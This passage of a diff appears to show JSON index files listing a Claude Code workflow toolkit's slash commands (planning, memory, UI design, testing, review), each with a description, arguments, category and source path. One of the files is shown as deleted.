"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
},
{
"name": "workflow:ui-design:import-from-code",
"command": "/workflow:ui-design:import-from-code",
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/import-from-code.md"
},
{
"name": "layout-extract",
"command": "/workflow:ui-design:layout-extract",
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/layout-extract.md"
},
{
"name": "workflow:ui-design:reference-page-generator",
"command": "/workflow:ui-design:reference-page-generator",
"description": "Generate multi-component reference pages and documentation from design run extraction",
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
},
{
"name": "style-extract",
"command": "/workflow:ui-design:style-extract",
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/style-extract.md"
}
]
}
}

View File

@@ -1,896 +0,0 @@
{
"general": [
{
"name": "cli-init",
"command": "/cli:cli-init",
"description": "Generate .gemini/ and .qwen/ config directories with settings.json and ignore files based on workspace technology detection",
"arguments": "[--tool gemini|qwen|all] [--output path] [--preview]",
"category": "cli",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/cli/cli-init.md"
},
{
"name": "enhance-prompt",
"command": "/enhance-prompt",
"description": "Enhanced prompt transformation using session memory and intent analysis with --enhance flag detection",
"arguments": "user input to enhance",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/enhance-prompt.md"
},
{
"name": "issue:discover",
"command": "/issue:discover",
"description": "Discover potential issues from multiple perspectives (bug, UX, test, quality, security, performance, maintainability, best-practices) using CLI explore. Supports Exa external research for security and best-practices perspectives.",
"arguments": "<path-pattern> [--perspectives=bug,ux,...] [--external]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/discover.md"
},
{
"name": "new",
"command": "/issue:new",
"description": "Create structured issue from GitHub URL or text description",
"arguments": "<github-url | text-description> [--priority 1-5]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/new.md"
},
{
"name": "queue",
"command": "/issue:queue",
"description": "Form execution queue from bound solutions using issue-queue-agent (solution-level)",
"arguments": "[--rebuild] [--issue <id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/issue/queue.md"
},
{
"name": "compact",
"command": "/memory:compact",
"description": "Compact current session memory into structured text for session recovery, extracting objective/plan/files/decisions/constraints/state, and save via MCP core_memory tool",
"arguments": "[optional: session description]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/compact.md"
},
{
"name": "load",
"command": "/memory:load",
"description": "Delegate to universal-executor agent to analyze project via Gemini/Qwen CLI and return JSON core content package for task context",
"arguments": "[--tool gemini|qwen] \\\"task context description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load.md"
},
{
"name": "tech-research-rules",
"command": "/memory:tech-research-rules",
"description": "3-phase orchestrator: extract tech stack → Exa research → generate path-conditional rules (auto-loaded by Claude Code)",
"arguments": "[session-id | tech-stack-name] [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/tech-research-rules.md"
},
{
"name": "update-full",
"command": "/memory:update-full",
"description": "Update all CLAUDE.md files using layer-based execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[--tool gemini|qwen|codex] [--path <directory>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-full.md"
},
{
"name": "update-related",
"command": "/memory:update-related",
"description": "Update CLAUDE.md for git-changed modules using batched agent execution (4 modules/agent) with gemini→qwen→codex fallback, <15 modules uses direct execution",
"arguments": "[--tool gemini|qwen|codex]",
"category": "memory",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/memory/update-related.md"
},
{
"name": "version",
"command": "/version",
"description": "Display Claude Code version information and check for updates",
"arguments": "",
"category": "general",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/version.md"
},
{
"name": "artifacts",
"command": "/workflow:brainstorm:artifacts",
"description": "Interactive clarification generating confirmed guidance specification through role-based analysis and synthesis",
"arguments": "topic or challenge description [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/artifacts.md"
},
{
"name": "auto-parallel",
"command": "/workflow:brainstorm:auto-parallel",
"description": "Parallel brainstorming automation with dynamic role selection and concurrent execution across multiple perspectives",
"arguments": "topic or challenge description\" [--count N]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/auto-parallel.md"
},
{
"name": "data-architect",
"command": "/workflow:brainstorm:data-architect",
"description": "Generate or update data-architect/analysis.md addressing guidance-specification discussion points for data architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/data-architect.md"
},
{
"name": "product-manager",
"command": "/workflow:brainstorm:product-manager",
"description": "Generate or update product-manager/analysis.md addressing guidance-specification discussion points for product management perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-manager.md"
},
{
"name": "product-owner",
"command": "/workflow:brainstorm:product-owner",
"description": "Generate or update product-owner/analysis.md addressing guidance-specification discussion points for product ownership perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/product-owner.md"
},
{
"name": "scrum-master",
"command": "/workflow:brainstorm:scrum-master",
"description": "Generate or update scrum-master/analysis.md addressing guidance-specification discussion points for Agile process perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/scrum-master.md"
},
{
"name": "subject-matter-expert",
"command": "/workflow:brainstorm:subject-matter-expert",
"description": "Generate or update subject-matter-expert/analysis.md addressing guidance-specification discussion points for domain expertise perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/subject-matter-expert.md"
},
{
"name": "synthesis",
"command": "/workflow:brainstorm:synthesis",
"description": "Clarify and refine role analyses through intelligent Q&A and targeted updates with synthesis agent",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/brainstorm/synthesis.md"
},
{
"name": "system-architect",
"command": "/workflow:brainstorm:system-architect",
"description": "Generate or update system-architect/analysis.md addressing guidance-specification discussion points for system architecture perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/system-architect.md"
},
{
"name": "ux-expert",
"command": "/workflow:brainstorm:ux-expert",
"description": "Generate or update ux-expert/analysis.md addressing guidance-specification discussion points for UX perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ux-expert.md"
},
{
"name": "clean",
"command": "/workflow:clean",
"description": "Intelligent code cleanup with mainline detection, stale artifact discovery, and safe execution",
"arguments": "[--dry-run] [\\\"focus area\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/clean.md"
},
{
"name": "debug",
"command": "/workflow:debug",
"description": "Interactive hypothesis-driven debugging with NDJSON logging, iterative until resolved",
"arguments": "\\\"bug description or error message\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/debug.md"
},
{
"name": "init",
"command": "/workflow:init",
"description": "Initialize project-level state with intelligent project analysis using cli-explore-agent",
"arguments": "[--regenerate]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/init.md"
},
{
"name": "lite-fix",
"command": "/workflow:lite-fix",
"description": "Lightweight bug diagnosis and fix workflow with intelligent severity assessment and optional hotfix mode for production incidents",
"arguments": "[--hotfix] \\\"bug description or issue reference\\",
"category": "workflow",
"subcategory": null,
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-fix.md"
},
{
"name": "list",
"command": "/workflow:session:list",
"description": "List all workflow sessions with status filtering, shows session metadata and progress information",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Beginner",
"source": "../../../commands/workflow/session/list.md"
},
{
"name": "solidify",
"command": "/workflow:session:solidify",
"description": "Crystallize session learnings and user-defined constraints into permanent project guidelines",
"arguments": "[--type <convention|constraint|learning>] [--category <category>] \\\"rule or insight\\",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/solidify.md"
},
{
"name": "start",
"command": "/workflow:session:start",
"description": "Discover existing sessions or start new workflow session with intelligent session management and conflict detection",
"arguments": "[--type <workflow|review|tdd|test|docs>] [--auto|--new] [optional: task description for new session]",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/start.md"
},
{
"name": "conflict-resolution",
"command": "/workflow:tools:conflict-resolution",
"description": "Detect and resolve conflicts between plan and existing codebase using CLI-powered analysis with Gemini/Qwen",
"arguments": "--session WFS-session-id --context path/to/context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/conflict-resolution.md"
},
{
"name": "gather",
"command": "/workflow:tools:gather",
"description": "Intelligently collect project context using context-search-agent based on task description, packages into standardized JSON",
"arguments": "--session WFS-session-id \\\"task description\\",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/context-gather.md"
},
{
"name": "animation-extract",
"command": "/workflow:ui-design:animation-extract",
"description": "Extract animation and transition patterns from prompt inference and image references for design system documentation",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--focus \"<types>\"] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/animation-extract.md"
},
{
"name": "explore-auto",
"command": "/workflow:ui-design:explore-auto",
"description": "Interactive exploratory UI design workflow with style-centric batch generation, creates design variants from prompts/images with parallel execution and user selection",
"arguments": "[--input \"<value>\"] [--targets \"<list>\"] [--target-type \"page|component\"] [--session <id>] [--style-variants <count>] [--layout-variants <count>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/explore-auto.md"
},
{
"name": "imitate-auto",
"command": "/workflow:ui-design:imitate-auto",
"description": "UI design workflow with direct code/image input for design token extraction and prototype generation",
"arguments": "[--input \"<value>\"] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/imitate-auto.md"
},
{
"name": "layout-extract",
"command": "/workflow:ui-design:layout-extract",
"description": "Extract structural layout information from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--targets \"<list>\"] [--variants <count>] [--device-type <desktop|mobile|tablet|responsive>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/layout-extract.md"
},
{
"name": "style-extract",
"command": "/workflow:ui-design:style-extract",
"description": "Extract design style from reference images or text prompts using Claude analysis with variant generation or refinement mode",
"arguments": "[--design-id <id>] [--session <id>] [--images \"<glob>\"] [--prompt \"<desc>\"] [--variants <count>] [--interactive] [--refine]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "general",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/style-extract.md"
}
],
"implementation": [
{
"name": "execute",
"command": "/issue:execute",
"description": "Execute queue with codex using DAG-based parallel orchestration (solution-level)",
"arguments": "[--worktree] [--queue <queue-id>]",
"category": "issue",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/issue/execute.md"
},
{
"name": "create",
"command": "/task:create",
"description": "Generate task JSON from natural language description with automatic file pattern detection, scope inference, and dependency analysis",
"arguments": "\\\"task title\\",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/create.md"
},
{
"name": "execute",
"command": "/task:execute",
"description": "Execute task JSON using appropriate agent (@doc-generator/@implementation-agent/@test-agent) with pre-analysis context loading and status tracking",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/task/execute.md"
},
{
"name": "execute",
"command": "/workflow:execute",
"description": "Coordinate agent execution for workflow tasks with automatic session discovery, parallel task processing, and status tracking",
"arguments": "[--resume-session=\\\"session-id\\\"]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/execute.md"
},
{
"name": "lite-execute",
"command": "/workflow:lite-execute",
"description": "Execute tasks based on in-memory plan, prompt description, or file content",
"arguments": "[--in-memory] [\\\"task description\\\"|file-path]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-execute.md"
},
{
"name": "test-cycle-execute",
"command": "/workflow:test-cycle-execute",
"description": "Execute test-fix workflow with dynamic task generation and iterative fix cycles until test pass rate >= 95% or max iterations reached. Uses @cli-planning-agent for failure analysis and task generation.",
"arguments": "[--resume-session=\\\"session-id\\\"] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-cycle-execute.md"
},
{
"name": "task-generate-agent",
"command": "/workflow:tools:task-generate-agent",
"description": "Generate implementation plan documents (IMPL_PLAN.md, task JSONs, TODO_LIST.md) using action-planning-agent - produces planning artifacts, does NOT execute code implementation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-agent.md"
},
{
"name": "task-generate-tdd",
"command": "/workflow:tools:task-generate-tdd",
"description": "Autonomous TDD task generation using action-planning-agent with Red-Green-Refactor cycles, test-first structure, and cycle validation",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/task-generate-tdd.md"
},
{
"name": "test-task-generate",
"command": "/workflow:tools:test-task-generate",
"description": "Generate test planning documents (IMPL_PLAN.md, test task JSONs, TODO_LIST.md) using action-planning-agent - produces test planning artifacts, does NOT execute tests",
"arguments": "--session WFS-test-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-task-generate.md"
},
{
"name": "generate",
"command": "/workflow:ui-design:generate",
"description": "Assemble UI prototypes by combining layout templates with design tokens (default animation support), pure assembler without new content generation",
"arguments": "[--design-id <id>] [--session <id>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "implementation",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/generate.md"
}
],
"planning": [
{
"name": "plan",
"command": "/issue:plan",
"description": "Batch plan issue resolution using issue-plan-agent (explore + plan closed-loop)",
"arguments": "--all-pending <issue-id>[,<issue-id>,...] [--batch-size 3] ",
"category": "issue",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/issue/plan.md"
},
{
"name": "breakdown",
"command": "/task:breakdown",
"description": "Decompose complex task into subtasks with dependency mapping, creates child task JSONs with parent references and execution order",
"arguments": "task-id",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/breakdown.md"
},
{
"name": "replan",
"command": "/task:replan",
"description": "Update task JSON with new requirements or batch-update multiple tasks from verification report, tracks changes in task-changes.json",
"arguments": "task-id [\\\"text\\\"|file.md] | --batch [verification-report.md]",
"category": "task",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/task/replan.md"
},
{
"name": "action-plan-verify",
"command": "/workflow:action-plan-verify",
"description": "Perform non-destructive cross-artifact consistency analysis between IMPL_PLAN.md and task JSONs with quality gate validation",
"arguments": "[optional: --session session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/action-plan-verify.md"
},
{
"name": "api-designer",
"command": "/workflow:brainstorm:api-designer",
"description": "Generate or update api-designer/analysis.md addressing guidance-specification discussion points for API design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/api-designer.md"
},
{
"name": "ui-designer",
"command": "/workflow:brainstorm:ui-designer",
"description": "Generate or update ui-designer/analysis.md addressing guidance-specification discussion points for UI design perspective",
"arguments": "optional topic - uses existing framework if available",
"category": "workflow",
"subcategory": "brainstorm",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/brainstorm/ui-designer.md"
},
{
"name": "lite-plan",
"command": "/workflow:lite-plan",
"description": "Lightweight interactive planning workflow with in-memory planning, code exploration, and execution dispatch to lite-execute after user confirmation",
"arguments": "[-e|--explore] \\\"task description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/lite-plan.md"
},
{
"name": "plan",
"command": "/workflow:plan",
"description": "5-phase planning workflow with action-planning-agent task generation, outputs IMPL_PLAN.md and task JSONs",
"arguments": "\\\"text description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/plan.md"
},
{
"name": "replan",
"command": "/workflow:replan",
"description": "Interactive workflow replanning with session-level artifact updates and boundary clarification through guided questioning",
"arguments": "[--session session-id] [task-id] \\\"requirements\\\"|file.md [--interactive]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/replan.md"
},
{
"name": "tdd-plan",
"command": "/workflow:tdd-plan",
"description": "TDD workflow planning with Red-Green-Refactor task chain generation, test-first development structure, and cycle tracking",
"arguments": "\\\"feature description\\\"|file.md",
"category": "workflow",
"subcategory": null,
"usage_scenario": "planning",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-plan.md"
},
{
"name": "workflow:ui-design:codify-style",
"command": "/workflow:ui-design:codify-style",
"description": "Orchestrator to extract styles from code and generate shareable reference package with preview (automatic file discovery)",
"arguments": "<path> [--package-name <name>] [--output-dir <path>] [--overwrite]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/codify-style.md"
},
{
"name": "design-sync",
"command": "/workflow:ui-design:design-sync",
"description": "Synchronize finalized design system references to brainstorming artifacts, preparing them for /workflow:plan consumption",
"arguments": "--session <session_id> [--selected-prototypes \"<list>\"]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/design-sync.md"
},
{
"name": "workflow:ui-design:import-from-code",
"command": "/workflow:ui-design:import-from-code",
"description": "Import design system from code files (CSS/JS/HTML/SCSS) with automatic file discovery and parallel agent analysis",
"arguments": "[--design-id <id>] [--session <id>] [--source <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/import-from-code.md"
},
{
"name": "workflow:ui-design:reference-page-generator",
"command": "/workflow:ui-design:reference-page-generator",
"description": "Generate multi-component reference pages and documentation from design run extraction",
"arguments": "[--design-run <path>] [--package-name <name>] [--output-dir <path>]",
"category": "workflow",
"subcategory": "ui-design",
"usage_scenario": "planning",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/ui-design/reference-page-generator.md"
}
],
"documentation": [
{
"name": "code-map-memory",
"command": "/memory:code-map-memory",
"description": "3-phase orchestrator: parse feature keyword → cli-explore-agent analyzes (Deep Scan dual-source) → orchestrator generates Mermaid docs + SKILL package (skips phase 2 if exists)",
"arguments": "\\\"feature-keyword\\\" [--regenerate] [--tool <gemini|qwen>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/code-map-memory.md"
},
{
"name": "docs-full-cli",
"command": "/memory:docs-full-cli",
"description": "Generate full project documentation using CLI execution (Layer 3→1) with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <20 modules uses direct parallel",
"arguments": "[path] [--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-full-cli.md"
},
{
"name": "docs-related-cli",
"command": "/memory:docs-related-cli",
"description": "Generate/update documentation for git-changed modules using CLI execution with batched agents (4 modules/agent) and gemini→qwen→codex fallback, <15 modules uses direct parallel",
"arguments": "[--tool <gemini|qwen|codex>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs-related-cli.md"
},
{
"name": "docs",
"command": "/memory:docs",
"description": "Plan documentation workflow with dynamic grouping (≤10 docs/task), generates IMPL tasks for parallel module trees, README, ARCHITECTURE, and HTTP API docs",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/docs.md"
},
{
"name": "load-skill-memory",
"command": "/memory:load-skill-memory",
"description": "Activate SKILL package (auto-detect from paths/keywords or manual) and intelligently load documentation based on task intent keywords",
"arguments": "[skill_name] \\\"task intent description\\",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/load-skill-memory.md"
},
{
"name": "skill-memory",
"command": "/memory:skill-memory",
"description": "4-phase autonomous orchestrator: check docs → /memory:docs planning → /workflow:execute → generate SKILL.md with progressive loading index (skips phases 2-3 if docs exist)",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--regenerate] [--mode <full|partial>] [--cli-execute]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/skill-memory.md"
},
{
"name": "style-skill-memory",
"command": "/memory:style-skill-memory",
"description": "Generate SKILL memory package from style reference for easy loading and consistent design system usage",
"arguments": "[package-name] [--regenerate]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/style-skill-memory.md"
},
{
"name": "swagger-docs",
"command": "/memory:swagger-docs",
"description": "Generate complete Swagger/OpenAPI documentation following RESTful standards with global security, API details, error codes, and validation tests",
"arguments": "[path] [--tool <gemini|qwen|codex>] [--format <yaml|json>] [--version <v3.0|v3.1>] [--lang <zh|en>]",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/swagger-docs.md"
},
{
"name": "workflow-skill-memory",
"command": "/memory:workflow-skill-memory",
"description": "Process WFS-* archived sessions using universal-executor agents with Gemini analysis to generate workflow-progress SKILL package (sessions-timeline, lessons, conflicts)",
"arguments": "session <session-id> | all",
"category": "memory",
"subcategory": null,
"usage_scenario": "documentation",
"difficulty": "Intermediate",
"source": "../../../commands/memory/workflow-skill-memory.md"
}
],
"analysis": [
{
"name": "review-fix",
"command": "/workflow:review-fix",
"description": "Automated fixing of code review findings with AI-powered planning and coordinated execution. Uses intelligent grouping, multi-stage timeline coordination, and test-driven verification.",
"arguments": "<export-file|review-dir> [--resume] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-fix.md"
},
{
"name": "review-module-cycle",
"command": "/workflow:review-module-cycle",
"description": "Independent multi-dimensional code review for specified modules/files. Analyzes specific code paths across 7 dimensions with hybrid parallel-iterative execution, independent of workflow sessions.",
"arguments": "<path-pattern> [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-module-cycle.md"
},
{
"name": "review",
"command": "/workflow:review",
"description": "Post-implementation review with specialized types (security/architecture/action-items/quality) using analysis agents and Gemini",
"arguments": "[--type=security|architecture|action-items|quality] [--archived] [optional: session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "analysis",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review.md"
}
],
"session-management": [
{
"name": "review-session-cycle",
"command": "/workflow:review-session-cycle",
"description": "Session-based comprehensive multi-dimensional code review. Analyzes git changes from workflow session across 7 dimensions with hybrid parallel-iterative execution, aggregates findings, and performs focused deep-dives on critical issues until quality gates met.",
"arguments": "[session-id] [--dimensions=security,architecture,...] [--max-iterations=N]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/review-session-cycle.md"
},
{
"name": "complete",
"command": "/workflow:session:complete",
"description": "Mark active workflow session as complete, archive with lessons learned, update manifest, remove active flag",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/complete.md"
},
{
"name": "resume",
"command": "/workflow:session:resume",
"description": "Resume the most recently paused workflow session with automatic session discovery and status update",
"arguments": "",
"category": "workflow",
"subcategory": "session",
"usage_scenario": "session-management",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/session/resume.md"
}
],
"testing": [
{
"name": "tdd-verify",
"command": "/workflow:tdd-verify",
"description": "Verify TDD workflow compliance against Red-Green-Refactor cycles, generate quality report with coverage analysis",
"arguments": "[optional: WFS-session-id]",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tdd-verify.md"
},
{
"name": "test-fix-gen",
"command": "/workflow:test-fix-gen",
"description": "Create test-fix workflow session from session ID, description, or file path with test strategy generation and task planning",
"arguments": "(source-session-id | \\\"feature description\\\" | /path/to/file.md)",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-fix-gen.md"
},
{
"name": "test-gen",
"command": "/workflow:test-gen",
"description": "Create independent test-fix workflow session from completed implementation session, analyzes code to generate test tasks",
"arguments": "source-session-id",
"category": "workflow",
"subcategory": null,
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/test-gen.md"
},
{
"name": "tdd-coverage-analysis",
"command": "/workflow:tools:tdd-coverage-analysis",
"description": "Analyze test coverage and TDD cycle execution with Red-Green-Refactor compliance verification",
"arguments": "--session WFS-session-id",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Advanced",
"source": "../../../commands/workflow/tools/tdd-coverage-analysis.md"
},
{
"name": "test-concept-enhanced",
"command": "/workflow:tools:test-concept-enhanced",
"description": "Coordinate test analysis workflow using cli-execution-agent to generate test strategy via Gemini",
"arguments": "--session WFS-test-session-id --context path/to/test-context-package.json",
"category": "workflow",
"subcategory": "tools",
"usage_scenario": "testing",
"difficulty": "Intermediate",
"source": "../../../commands/workflow/tools/test-concept-enhanced.md"
},
{
"name": "test-context-gather",
"command": "/workflow:tools:test-context-gather",
